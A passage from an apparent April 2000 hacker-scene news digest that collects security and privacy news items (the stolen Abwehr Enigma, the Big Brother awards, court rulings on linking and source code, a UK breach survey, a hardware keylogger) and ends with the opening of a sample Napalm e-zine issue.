      Cryptographers around the world are hoping that this is some sort of
      cruel April Fools joke and that the machine will soon be returned.
      
      Updated Information on the Stolen Machine
      Wired
      
      http://home.cern.ch/~frode/crypto/BPAbwehr/Abwehr_theft.html
      http://www.wired.com/news/politics/0,1283,35409,00.html
      ----------
      
      Go to the first url for neat pics and technical data on the enigma
      - Ed
      
      Wired;
      
      Cryptos Try to Solve Enigma Crime by Lynn Burke 

      3:00 a.m. Apr. 5, 2000 PDT

      Whoever stole the rare, World War II 
      secret decoder known as the Abwehr Enigma is going to have a tough time 
      selling it on the online black market. 

      That's what cryptology enthusiasts are saying after the famous decoding 
      machine used during the war to protect German secret messages was taken 
      from its home in a glass display case at Bletchley Park Trust in London on 
      April 1. 

      "We hope that if the Internet community gets behind it, it will be 
      impossible to sell the machine on the public market," said Christine 
      Large, the trust's director. 

      Because the machine was stolen on April Fool's day, trust officials say 
      its theft may have been a prank. 

      "If it was just an April Fool, we hope our Abwehr Enigma turns up soon," 
      Large said. 

      But as long as the decoder remains at large, active cryptologists who 
      revere the analog antique are getting the word of its disappearance out 
      over the Web, hoping to catch a thief who might try and sell the item 
      online. Leading the effort is the Crypto Simulation Group, a small 
      group of cryptologists who specialize in the Enigma machines. 

      "In addition to our normal activities in cryptologic research, we have set 
      up Web pages ... to broadcast to as large a base as possible the features 
      of this rather unique piece of historical cipher equipment in the hope 
      that the thieves will be caught in the act of attempting to dispose 
      of it," said David Hamer, one of the group's members. 

      Hamer, a retired historian living in New Jersey and one of the world's 
      foremost Enigma experts, said it's important to rescue the machine because 
      it is one of only two of its kind known to still exist. The other one is 
      housed in the National Cryptologic Museum at Fort Meade, Maryland. 

      According to a spokesman at the museum, 200 "G" Enigmas were issued to the 
      German army high command during World War II for an unknown "special 
      purpose." But no one seems to know where most of those have ended up, 
      making the stolen machine all the more valuable. 

      "This Abwehr Enigma is a close to unique variant," and it's likely to be 
      worth quite a sum of cash, Hamer said. "Even standard service Enigmas are 
      rare enough to command prices in the tens of thousands of dollars," he 
      said. 

      Since the announcement of the theft, several sites dedicated to cryptology 
      have added a link to this urgent message about the machine's theft. 
      Message boards have been frenetic with hundreds of postings about the 
      machine's theft. 

      The decoder, which looks like little more than an old-fashioned typewriter 
      with a counter above the keyboard that resembles a car odometer, was given 
      to the museum in 1998 by Britain's intelligence agency, the Government 
      Communications Headquarters. 

      According to the U.S. National Security Agency, cryptology was key to the 
      success of the Allies in World War II. 

      "Information from decrypted Enigma messages (not necessarily the Abwehr) 
      was used time after time to outmaneuver German forces," said NSA 
      spokeswoman Judi Emmel. 

      "Losing this Enigma is a significant loss to the historic record of World 
      War II cryptology."
      
      
            
      
      @HWA
      
      
      
176.0 HNN:Apr 5th:Thailand Police Form Cyber Crime Panel 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by Evil Wench 
      A Committee for the Suppression of Computer Crimes has been formed by
      the Police Information System Centre to fight crimes involving
      technology including those committed on the Internet. Besides Police
      officers the committee also has members from local ISPs, the National
      Electronics and Computer Technology Centre (Nectec), security
      professionals and the Telephone Organization of Thailand.
      
      News Bytes
      
      http://www.newsbytes.com/pubNews/00/146912.html
      ----------
      
      The page or story you have requested is available to subscribers only!

      (Eat me. - Ed)      
      
      @HWA
      
177.0 HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench 
      An official Chinese government survey quoted by China Daily revealed
      that 40 percent of Chinese web sites have suffered online attacks. The
      State Council Development Research Center conducted a survey of 300
      Internet firms. 44 percent said that some of their information had been
      tampered with, and 40 percent claimed to have suffered an online
      malicious attack.
      
      Agence France Presse - via Inside China Today
      
      http://www.insidechina.com/news.php3?id
      ----------
      
      (I dunno, I couldn't find the story among that mess, you try looking 
      for it ... -Ed :-/ )
      
      @HWA
      
178.0 HNN:Apr 6th:DoubleClick Wins Privacy Award 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
       
      
      contributed by Evil Wench 
      The Computers, Freedom, and Privacy conference being held this week in
      Toronto Canada has awarded DoubleClick the prestigious corporate
      invader award. Other winners included Commerce Secretary William Daley
      who won the award for worst government official and credit reporting
      firm Transunion received the lifetime menace award.
      
      Computers, Freedom, and Privacy conference
      Wired
      
      http://www.cfp2000.org
      http://www.wired.com/news/politics/0,1283,35432,00.html
      ----------
      
      DoubleClick Wins for Losing by Declan McCullagh 

      3:00 a.m. Apr. 6, 2000 PDT

      TORONTO -- Say what you will about 
      liberal privacy advocates, but they sure do know how to have a good time. 

      Four of them dressed up as malicious characters from the Star Wars and 
      Austin Powers movies to hand the second annual "Big Brother" awards to 
      miscreant government agencies and large corporations on Wednesday evening. 

      The bald director of Privacy International, Simon Davies, was a 
      near-perfect Dr. Evil and master of ceremonies during the Computers, 
      Freedom, and Privacy conference. 

      The winner of the corporate invader award: DoubleClick, a company whose 
      now-legendary privacy missteps drew fire earlier this year. 

      Commerce Secretary William Daley won the worst government official award, 
      beating out the Federal Trade Commission. The Commerce Department has 
      hosted direct marketing conferences and oversees U.S. export controls of 
      encryption technology. 

      "We had a very tough time determining who would have the lifetime 
      achievement menace award," said Dave Banisar, a fellow at the Electronic 
      Privacy Information Center. 

      "To truly be a lifetime menace, you can't just be a flash in the pan. 
      DoubleClick has only been around for a few years." 

      An anonymous CFP conference-goer costumed as Star Wars' Darth Vader 
      accepted the award on behalf of credit reporting firm Transunion to 
      applause from the roughly 150-person audience. 

      Oddly enough, Transunion beat out the National Security Agency, which 
      championed the government-backdoored Clipper chip in the early 1990s and 
      spent decades trying to stifle academic encryption research in the United 
      States. 

      Winners of the pro-privacy Brandeis Award, named after U.S. Supreme Court 
      Justice Louis Brandeis, included Beth Givens of the Privacy Rights 
      Clearinghouse, and Richard Smith, who regularly exposes privacy violations 
      in consumer software products. 

      Previous Big Brother winners have included Microsoft and the FBI. 

      The CFP conference continues through Friday. 
      
      
      @HWA
      
      
179.0 HNN:Apr 6th:ACLU Appeals CPHack Ruling 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
      contributed by Evil Wench 
      Last week's ruling concerning CPHack by U.S. District Judge Edward
      Harrington was extremely vague and is now being appealed by the ACLU.
      CPHack revealed the list of web sites blocked by Cyber Patrol as well
      as allowing people to circumvent its blocking capabilities. The court's
      decision prevented people from linking to the software; the ACLU is
      charging that the US does not have the power to regulate the global
      Internet.
      
      Copy of Judge's Order
      Wired
      
      http://www.politechbot.com/cyberpatrol/final-injunction.html
      http://www.wired.com/news/business/0,1367,35464,00.html
      ----------
      
      @HWA
      
180.0 HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Macki 
      The Motion Picture Association of America has now filed for an injunction
      telling 2600 magazine what they can and cannot link to via their web
      site. Primarily, they are no longer allowed to link to sites that host
      copies of DeCSS.
      
      2600.com
      Wired
      
      http://www.2600.com/news/2000/0406.html
      http://www.wired.com/news/politics/0,1283,35394,00.html
      ----------
      
      @HWA
      
      
      
181.0 HNN:Apr 6th:Enigma Suspect Busted 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by whitevampire 
      Police have arrested and released on bail an unidentified English man
      for the theft of the Abwehr Enigma machine. The machine was recently
      stolen from the museum at Bletchley Park Trust. It has been valued at
      $150,000 but to many it is priceless. Police are still searching for
      the machine itself.
      
      More information on the Machine
      Wired
      Reuters - via Yahoo
      
      http://home.cern.ch/~frode/crypto/BPAbwehr/Abwehr_theft.html
      http://wired.com/news/politics/0,1283,35433,00.html
      http://dailynews.yahoo.com/h/nm/20000405/od/machine_1.html
      ----------
      
      @HWA
      
      
      
182.0 HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by darkscent 
      Privacy advocates and Paul George, supervisory special agent for the
      Michigan bureau of the FBI faced off during the 10th Annual Computer,
      Freedom & Privacy Conference in Toronto, Canada. George had quite a
      few memorable things to say "There are worse things than having your
      privacy violated ... like murder.", "If there is going to be a Big
      Brother in the United States, it is going to be us -- the FBI", and
      "In order to prevent crime, information has to be collected... if
      justified."
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2522568,00.html?chkpt
      ----------
      
      FBI agent: I am Big Brother

      Pro-privacy groups might consider him 'the enemy,' but Paul George 
      counters: 'There are worse things than having your privacy violated ... 
      like murder.'

       
      By Robert Lemos, ZDNet News UPDATED April 6, 2000 10:36 AM PT 

      TORONTO -- Can effective law enforcement and personal privacy coexist?
      Law enforcement officials and privacy advocates faced off in a panel 
      discussion Wednesday over the issue of the trade-offs between security and 
      privacy at the 10th annual Computer, Freedom and Privacy 2000 Conference 
      in Toronto.

      
      "There are reasons law enforcement should and does have the power to 
      arrest and to search," said Paul George, supervisory special agent for the 
      Michigan bureau of the FBI. "There are worse things than having your 
      privacy violated ... like murder."

      George debated fiercely, but politely, with privacy advocates on the need 
      for privacy invasive investigative techniques -- such as wiretaps, 
      searches and Internet tracking -- to fight crime. In fact, recognizing 
      that many at the conference consider him to be "the enemy," George called 
      himself "the Big Brother in Michigan."

      
       'If there is going to be a Big Brother in the United States, it is going 
       to be us. The FBI.' -- FBI Supervisory Special Agent Paul George

       
      Few here doubt that privacy has been a casualty of the steady drive toward 
      computerization and the Internet economy.

      While corporations -- such as RealNetworks Inc. (Nasdaq: RNWK), 
      DoubleClick (Nasdaq: DCLK), Intel Corp. (Nasdaq: INTC) and Microsoft Corp. 
      (Nasdaq: MSFT) -- have increasingly been taken to task for invading 
      citizens' privacy on the Internet, law enforcement and the government 
      continue to be a major worry for privacy advocates.

      Surveillance on the rise

      Domestic surveillance is rising.

      In 1999, police officers searched for individuals in the National Crime 
      Information Center database 2 million times daily, up from the 600,000 
      daily transactions averaged in 1988. Likewise, wiretaps are expected to 
      rise more than 300 percent in the next 10 years, according to the 2001 FBI 
      budget request.

      The trends will only get worse, as technology lowers the barriers that 
      face law enforcement surveillance, said Thomas M. Cecil, a superior court 
      judge for the county of Sacramento, Calif. "In reality, most of what we 
      have is the illusion of openness. Today, we have de facto privacy policy 
      because we are inefficient; probing and gathering are time consuming and 
      expensive. That protects our privacy," he said.

      Jim X. Dempsey, senior staff counsel for the technology-policy think tank 
      Center for Democracy and Technology and a member of the panel, agreed, 
      adding that more efficient data collection makes a privacy policy that 
      much more critical. "As the technical hurdles are solved, then legal 
      limitations need to be put in place to limit the (invasion of privacy) of 
      citizens," he said.

      While Dempsey said he believed that privacy and citizen safety could 
      coexist, the FBI's George upheld the common wisdom that they cannot.

      "I don't know how (others) can say that there is no price to privacy or 
      price to security in this equation," he said. "In order to prevent crime, 
      information has to be collected ... if justified."

      Everyone a potential suspect?

      Yet, without proper regulations about 
      when and how data can be collected, such an assertion makes everyone a 
      suspect, said Jason Catlett, president of privacy information firm 
      Junkbusters Inc., who takes a dim view of current practices.

      "It's like they are saying that we have a lot of robbers, so in order to 
      protect the banks -- rather than make them more secure -- they are 
      requiring the identity of everyone who walks in front of banks."

      The FBI's George realizes where the FBI's push for more surveillance 
      powers puts the agency: "If there is going to be a Big Brother in the 
      United States, it is going to be us -- the FBI," he said.

 
      
      
      @HWA
      
      
      
183.0 HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by William Knowles 
      In an effort to get even more laws passed to protect our nation's
      'critical' infrastructure, Sen. Jon Kyl, R-Ariz. said that the
      recent DDoS "attacks contributed to a 258-point drop in the Dow
      Jones Industrial Average and halted a string of three days of
      consecutive record-high closes of the technology-laden Nasdaq
      Composite Index." Kyl is currently co-sponsoring S. 2092, which would
      allow national tap and trace orders for law enforcement. (Contributed?
      Notice he didn't mention how much they contributed. Talk about a
      scare tactic.)
      
      San Francisco Chronicle
      
      http://www.sfgate.com/cgi-bin/article.cgi?file
      ----------
      
      Item Not Found

      (sigh - Ed)
      
      
      @HWA
      
      
184.0 HNN:Apr 6th:History of the L0pht, Part 1 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by nonentity 
      Oxblood Ruffin, from the Cult of the Dead Cow, has released the first
      of a two part series that covers the formation and early history of
      L0pht Heavy Industries. Many of these details have not been published
      before.
      
      National Post
      
      http://www.nationalpost.com/financialpost.asp?f
      ----------
      
      bad url      
      
      @HWA
      
      
185.0 HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Dan 
      The 6th Circuit Appeals Court has overturned a lower court ruling and
      has concluded that the First Amendment does in fact protect computer
      source code. Therefore they have remanded Peter Junger's case over
      encryption exports back to the District Court for further
      consideration.
      
      6th Circuit Court Opinion
      Associated Press - via World News
      
      http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION
      http://www.worldnews.com/?action
      ----------
      
      @HWA
      
      
186.0 HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by acopalyse 
      Code-named Bullet and developed by ISS, this new software lets
      e-commerce companies scan a Web site visitor's hard drive to see if it
      is infected with Trojan horses, viruses or other malicious software
      that could be passed on to the e-commerce site. Few details about the
      program are available; the release date and pricing have not yet been
      announced. (Are companies going to warn users before they scan them?)
      
      CNN
      
      http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html
      ----------
       
       Frisking computers at the door

       From...



       April 6, 2000
       Web posted at: 8:53 a.m. EDT (1253 GMT)

       by Ellen Messmer

       (IDG) -- ISS has developed an
       intrusion-detection application,
       code-named Bullet, that lets
       e-commerce companies scan a Web site
       visitor's PC to see if it is infected with
       Trojan horses, such as Back Orifice, or
       viruses that could be passed on to the e-commerce site.

       Trojan horses let intruders seize remote control of PCs, and that could mean a
       compromise of an online banking system, for example, even when the correct
       user identification is employed to access the site. 

       "Businesses are just getting fed up with the crap
       coming off the Internet," says ISS CEO Thomas
       Noonan, adding that one bank is expected to
       announce it is using the ISS application on its
       home banking site this week. 

       The ISS application uses ActiveX technology to scan the laptop, and if required,
       wipe out the unwanted, dangerous code. Noonan acknowledges that use of the
       scanning application could touch off an invasion-of-privacy debate. 

       Further details about the application were not available. ISS has not announced
       when the application will become generally available or how much it will cost.
      
      
      @HWA
      
      
      
187.0 HNN:Apr 7th:Links to Web Sites Illegal 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
       
      
      contributed by Evil Wench 
      The Osaka District Court has ruled that under certain conditions
      linking one web site to another would violate the law. While slightly
      vague, it would seem that simply linking to a site that violates the
      law could be charged as aiding and abetting a crime.
      
      Asia Biz Tech
      
      http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID
      ----------

      Error

      The Reason: 
      CID$B$N@_Dj$,4V0c$C$F$$^$9!#%F%s%W%l!<%H$r3NG'$7$F2<$5$(B       
      
      (Can you dig it? - Ed)
      
      @HWA
      
      
      
188.0 HNN:Apr 7th:British Companies Complacent 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      From HNN http://www.hackernews.com/
       
        
      
      contributed by acopalyse 
      A study by the Department of Trade and Industry in Britain finds that
      British businesses are too complacent when it comes to online security.
      The Information Security Breaches Survey 2000 (ISBS 2000) found that
      60% of companies have suffered a security breach and that 30% do not
      feel they have anything worth protecting. It was also found that the
      average cost of each intrusion was only £20,000. The study will be
      released at Infosecurity Europe 2000 on 11 April at Olympia in London.
      
      The UK Register
      
      http://www.theregister.co.uk/000406-000023.html
      ----------
      
      Posted 06/04/2000 3:16pm by Tim Richardson

      UK PLC leaves door open to hackers - report

      British companies are too complacent when it comes to Internet security
      and only have themselves to blame if their IT systems are compromised by
      hackers. That's just one of the conclusions of a new survey published by
      the Department of Trade and Industry (DTI) which reveals that two thirds
      of companies in Britain have suffered security breaches within the last 
      two years.
      
      But the survey also reports that most of the losses are under £20,000. 
      This is chicken-feed to mega-corporations, and many of them don't take 
      corrective action even after a loss, possibly because fixing the holes 
      would be more expensive than just accepting continuing small losses. 

      Of those suffering a serious security breach 64 per cent said 
      "nothing has changed" since the trespass occurred.  Just under half
      of all security breaches were due to human error. 

      Malcolm Skinner, Product Marketing manager, AXENT Technologies, said:
      "The report indicates that, to date, businesses have been far too 
      complacent. In addition to the perils of having your network or Web
      site hacked, companies must think of the consequences as far as customer
      trust is concerned." 

      Tom Perrott, Research director, Taylor Nelson Sofres said: "Although
      there have been some well publicised security breaches, it is generally
      accepted that those brought to the attention of the public are likely 
      to be the tip of the iceberg." 

 
      The key findings of ISBS 2000 show that: 

      + 60 per cent of organisations have suffered a security breach in the
        last two years.
        

      + Over 30 per cent of organisations do not recognise that their business
        information is either sensitive or critical and therefore a business 
        asset worth protecting. 
        
      + 82 per cent of businesses with external electronic links do not use
        any firewall protection, and 59 per cent of those with a Web site do
        not use Web site protection.

      + Of those organisations that have critical or sensitive information,
        63 per cent had suffered a breach that was considered serious to 
        some degree.

      + One in three businesses are either already buying or selling over
        the Internet, or intend to start in the near future.
      
      + Some good practices are implemented and adhered to by 83 per cent 
        of the organisations interviewed - eg. virus protection and password
        controls.

      + Only 37 per cent of organisations interviewed have undertaken a risk
        assessment where a systematic approach is taken to assess the security
        risks faced by the organisation.

      + 40 per cent of the security breaches reported by companies were due to 
        operator or user error, reinforcing the fact that information security
        cannot simply be solved by technology alone.

      + Nearly three quarters of organisations that suffered a breach, which
        they regarded to be serious, had no contingency plan in place to deal
        with it.

      + More than half of the organisations do not believe that there is 
        anything they could have done to prevent the most serious breaches they
        have suffered.

      + Only one in seven organisations has a formal information management 
        security policy in place.

      + Organisations where responsibility for information security rests at
        board level are those most likely to have formal policies in place. 
        The presence of a formal policy is one of the most important issues 
        in reporting and resolving security breaches.


      The full findings of the DTI's Information Security Breaches Survey 
      2000 (ISBS 2000) will be released at Infosecurity Europe 2000 on 11 
      April at Olympia in London.

      
      @HWA
      
      
      
189.0 HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by William Knowles 
      In the first case of its kind in Hong Kong a teenager has been
      sentenced to six months in jail after pleading guilty to 49 computer
      crime-related charges. Two other accomplices were sent to detention
      centers. The trio got to know each other online where they traded name
      and password information on various accounts. The three have been
      released on bail pending an appeal.
      
      Agence France-Presse - via Nando Times
      
      http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html
      ----------
      
      Teen reportedly Hong Kong's first convicted Internet hacker 

      Copyright © 2000 Nando Media
      Copyright © 2000 Agence France-Presse


      Agence France-Presse 

      HONG KONG (April 6, 2000 8:02 a.m. EDT http://www.nandotimes.com) - A Hong 
      Kong teenager has been sentenced to six months in jail for hacking into 
      the Internet in the first case of its kind in the territory, a report said 
      Thursday. 

      Po Yiu-ming, 19, was jailed Wednesday, while two of his companions, Tam 
      Hei-lun, 19, and Mak King-lam, 18, were sent to a detention center after 
      pleading guilty to a total of 49 computer crime-related charges, the Hong 
      Kong Standard reported. 

      It was the first case to be brought before a Hong Kong court after the 
      computer crime laws were enacted in 1994. 

      The trio -- who reportedly got to know each other through surfing the 
      Internet -- exchanged illegally-gained login names and passwords in order 
      to hack into the accounts of Internet subscribers. 

      Magistrate Ian Candy described the three as "intelligent" individuals who 
      could have developed their computer skills for good causes. 

      But Candy said the offenses were serious and they had to be given 
      custodial sentences as a deterrent to others. 

      The trio were released on bail of 10,000 Hong Kong dollars ($1,285) 
      pending appeal. 

      On Wednesday, a system analyst was sentenced to perform 100 hours of 
      community service for unlawfully retrieving tendering data from a 
      government computer system. 

      
      
      @HWA
      
      
190.0 HNN:Apr 7th:Census Afraid of Electronic Intrusion 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
       
      
      contributed by Evil Wench 
      While the US Census Bureau claims that it is doing everything it can
      to increase responsiveness, it has deliberately played down the online
      option. The Bureau feels that it has not adequately tested the
      security of the site. So while the site is active and available, it
      is not being publicized. (It won't get broken into if we don't tell
      anyone about it.)
      
      Online Census Form
      Industry Standard - via Yahoo
      
      http://www.2000.census.gov/
      http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html
      ----------
      
      @HWA
      
191.0 HNN:Apr 7th:Hardware Key Logger Introduced 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by Weld Pond
      Software to monitor every keystroke has been around for a while, but
      now a New Zealand company has introduced a hardware device, small
      enough to be hidden inside the keyboard, that does the same thing.
      The small device, known as KeyGhost, monitors and records every
      keystroke typed on the keyboard and stores all of the data within
      itself. KeyGhost will retail for between $99 and $309.
      
      ZD Net UK
      
      http://www.zdnet.co.uk/news/2000/12/ns-14347.html
      ----------
      
      @HWA
      
      
      
192.0 HNN:Apr 7th:Napalm Issue 4 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
     
      
      contributed by Kynik 
      Issue 4 of Napalm has been released with articles on securing Solaris
      2.x and musical intonation. (Now that's a weird mix.)
      
      Napalm
      
      http://napalm.firest0rm.org/
      ----------
      
      
      Napalm is an e-zine devoted to computer security, with a healthy
      dose of music, news, and ethics. We are committed to helping
      people understand how to use their computers more securely, while
      still enjoying the technology and not getting bogged down in
      lingo. If you feel you have something to contribute, or you need
      some technical help (professionally or otherwise), don't hesitate
      to drop us a line.
      
      Here's a list of topics I'd like to see covered in Napalm
      eventually. Email us if you're willing to contribute on these
      topics or on any other topic of your liking.
      
      Issues
      
      Issue 4: Securing Solaris, Just Intonation, Music (Apr 5, 2000)
        Issue 4 Addendum:
          sol.secure
      
      Issue 3: HERF Guns, AI Security, C++              (Jan 31, 2000)
      
      Issue 2: Quantum Crypto, VPNs, more gh0st.net     (Dec 3, 1999)	
      
      Issue 1: Onion Routing, gh0st.net, Introduction   (Sep 29, 1999)
      
      
      To subscribe, send an email to napalm@firest0rm.org with a subject of SUBSCRIBE.
      To unsubscribe, same as above, but with a subject of UNSUBSCRIBE. 
      
      
      SAMPLE COPY (Issue #1 Sept 99)
      
           /\  /^/_ _ __  __ _|^|_ __ ___
          /  \/ / _` '_ \/ _` | | '_ ` _ \
         / /\  / (_| |_)  (_| | | | | | | |
        /_/  \/ \__, .__/\__,_|_|_| |_| |_|
                   |_|

      
      Issue 1 (Sep. 29, 1999)
      ___________________________________________________________________________
      The gh0st.net project:                      http://www.gh0st.net/index.html
      URL of the day:        (Computer geek cartoons) http://www.userfriendly.org
      All content copyright © 1999 by the individual authors, All Rights Reserved
      ___________________________________________________________________________
      
      - Editor's Comments
      - URLs
      - News
      - My Life As A Happy Hacker
      - Onion Routing
      - The gh0st.net Project
      - Violence, Censorship, & Our Rights
      - Future Issues
      - Credits
      
      ***********************************************************************
            *** Editor's Comments : Kynik
      ***********************************************************************
      
      For now, I'm just going to borrow the layout I used while I was HH editor.
      (Which I am no more.)  I'll try to make it a little bit more freeform than
      this first issue, but we'll have to see.  I'd like to see this zine
      diverge a little from the standard 'security info' theme and get into
      music, news and whatever tickles everyone's fancy.  Email me at
      kynik@gh0st.net for damn near anything.  Oh, and send me good links, too.
      
      NOTE: Due to the gh0st.net webserver and mailserver's owner moving very
      far away soon, the website may be inaccessible for quite some time.  You
      can contact us at napalmzine@hotmail.com until we get everything back up
      again.  Thanks to TF for actually hosting all the web pages and mail
      server!
      
      ***********************************************************************
            *** Random good URLs : Kynik
      ***********************************************************************
      
      The Roskilde music festival in Copenhagen, Denmark
      http://www.roskilde-festival.dk/
      
      The OSKit - build your own OS
      http://www.cs.utah.edu/flux/oskit/
      
      gh0stOS
      http://www.gh0st.net/gh0stOS/
      
      Good source code for neural networks
      http://www.geocities.com/CapeCanaveral/1624/
      
      Irish pop-punk
      http://www.iol.ie/~brooder
      
      ***********************************************************************
            *** My Life As A Happy Hacker : Kynik
      ***********************************************************************
      
      A long time ago (probably 3-4 years) on a computer lab workstation far,
      far away (ok, it was the Midwest) I discovered the Happy Hacker in my
      quest for knowledge of the computer sort.  I found it after sifting
      through search engine results of the keyword 'hacker'.  I had been
      inspired by such movies as "Wargames" and "Sneakers" and realized that
      there was a lot more to this computer thing than Doom and Microsoft Word.
      Having realized this, I dove headfirst into the web, trying to find a
      place that suited my wants and actually had an air of intelligence.
      
      Many of the sites I found were crude and obviously created by
      middle-school-aged kids looking to mess with their friends on AOL.  Two
      things I found caught my attention immediately: Silicon Toad and The Happy
      Hacker mailing list.  I proceeded to download a whole pile of programs
      from Silicon Toad's site, and played with them on my computer at home, but
      beyond that, didn't do too much.  I checked in on it every once in awhile,
      until the site disappeared.  I kept on getting the happy hacker
      newsletter, and found out how to do some neat, trivial things such as
      changing my Windows 95 splash screen for startup and shutdown.
      
      Then I began to read about some of the things that people had done with
      their computers, and against the list founder, Carolyn Meinel.  I didn't
      think too much about this at the time, but kept my interested fascination
      with the whole 'hacker culture' as I progressed with my Computer Science
      degree.  I continued to receive the digest, and towards the end of 1998, I
      got a Happy Hacker digest with a request for a new UNIX editor.  Having
      read most of the info out there about Carolyn Meinel and the general
      consensus about her, I thought about it carefully before I sent in an
      application.  I realized the stigma that currently goes along with CPM and
      the Happy Hacker name, but after consideration, I thought I'd try to keep
      alive the idea that got me into the Happy Hacker in the first place:
      Knowledge and Ethics.  Granted, CPM is currently more interested in money
      and promoting herself than educating and instilling ethics, from what I've
      seen.
      
      I emailed her, and asked if the position was still available.  She asked
      me to write a Guide to (Mostly) Harmless Hacking (GTMHH) on any topic I
      chose.  I chose to write a beginner's guide to C++, since there already
      was one for C.  Well, I sent her a small piece of what I had written, and
      she advised me that Guide submissions are generally much longer.  So I set
      off to flesh it out and expand on the parts she said were somewhat
      lacking.  I got about 2/3 of the way through it, and grad school and work
      took precedence.  A few weeks later, totally to my surprise, I got an
      email from Carolyn asking me if I wanted the position.  I said yes, we
      exchanged our PGP keys, I got the passwords to the unixeditor POP account,
      and I started reading submissions and putting them together to form the
      Happy Hacker UNIX digest.  To see the digests, as they were submitted to
      Carolyn, go to the following URL:
      
      http://fire.gh0st.net/hh/index.html
      
      The first few digests were pretty weak, as most of the questions I got
      were rather bland, and I was still getting the feel of the position.  I
      got very few flames, and a lot of praise.  I realized that I might
      actually be making a difference to some people, trying to help them
      understand the basics (and some details) of UNIX and computer security.
      When I heard that Carolyn had moved the HH mailserver over to an
      AntiOnline computer, I wasn't thrilled, but I really didn't care all that
      much at the moment.  Keydet89, the windows editor, apparently left because
      of this, which was rather sad, because he always had good perl snippets in
      his digests.  (Send me an email keydet, if you wanna tell about your
      experience, or write some articles :)
      
      Then I thought about it.  I looked back at AntiOnline's features section,
      and I thought about JP's article on "Hacker Profiling".  Pieces started to
      fit together.  I thought about the possibility that JP was making copies
      of any mails that I received as a submission and adding them to his pile
      of material to be filtered and info to be added to the 'hacker database'.
      See, a lot of times I'll be sent an email claiming to have broken into a
      site and wanting to know what to do from there.  (Or, someone requests me
      to break into a site for them -- which I'd consider doing, provided you're
      paying me and the site is yours.)  In the second-last HH digest, I
      included a link to my PGP key, and an alternate email address that people
      could write to.  I'd say about half of the respondents used the other
      email address... and 2 or 3 used the PGP key.  I realized that I needed a
      bit more creative freedom, without eyes peeking over my shoulders.
      
      So, I teamed up with some people I had met online, and had been working
      with for a little while, and offered to create a new zine, with an
      emphasis on computers, security, and music.  I wanted to give the people
      that needed a certain amount of mentoring a chance to get some people to
      talk to if they needed help.  I found out that there was a similar group
      of people working on a project similar to the Happy Hacker wargames, but
      cooler, and I started hanging out with them as well.  So, here ends my
      Happy Hacker story.  I know I've left out some minor details, but don't
      worry, they weren't that important.  Let's have a big round of applause
      for the gh0st.net and FireStorm guys!  Hopefully the projects will pick up
      soon, and there will be more to see on both the fire.gh0st.net and
      www.gh0st.net sites.
      
        -Kynikeren
      
      ***********************************************************************
            *** Onion Routing : Kynik
      ***********************************************************************
      
      While it seems that the term "Onion Routing" may be copyrighted, I feel
      that it is a good description of the technology.  Onion Routing is an
      Internet-based system to prevent eavesdropping and traffic analysis.  The
      name "Onion Routing" is appropriate, since it is based upon adding several
      layers of encryption to a message (and removing them one at a time) as it
      is passed along the network, as one might remove the layers of an onion.
      (I suppose one could also call it 'artichoke routing' too ;)  This is
      essential to a network where privacy and anonymity are important.
      
      "Well, so what about privacy, everything I'm sending to that site is
      encrypted with SSL, anyways", you may say.  That's all fine and dandy, but
      chances are, anybody monitoring you knows at least that you've been there,
